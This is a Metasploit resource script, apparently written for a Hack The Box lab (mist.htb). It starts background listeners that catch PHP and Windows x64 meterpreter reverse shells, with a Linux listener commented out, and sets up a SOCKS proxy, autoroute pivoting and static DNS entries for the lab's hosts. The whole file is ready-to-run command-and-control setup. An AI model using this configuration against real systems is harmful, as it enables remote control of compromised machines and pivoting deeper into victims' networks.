set Prompt [Knight Operation Console]
set MeterpreterPrompt [Knight Enemy]

# custom for your love

setg payload windows/meterpreter/reverse_tcp
# setg RHOSTS 114.5.1.4

use multi/handler
set payload php/meterpreter/reverse_tcp
set ExitOnSession false
set LHOST 0.0.0.0 
set LPORT 4444
run -j 

set payload windows/x64/meterpreter/reverse_tcp
set LPORT 6789
set ExitOnSession false
set LHOST 0.0.0.0
run -j 

use socks_proxy
run 

use manage/autoroute

dns add-static mist.htb 192.168.100.100
dns add-static ms01.mist.htb 192.168.100.101
dns add-static dc01.mist.htb 192.168.100.100

# uncomment this for Automatically creating a job listener background with multi listeners
# run -j
# set payload linux/x64/meterpreter/reverse_tcp
# set LPORT 6790
# 


# uncomment this for Automatically creating a job listener background
# run -j 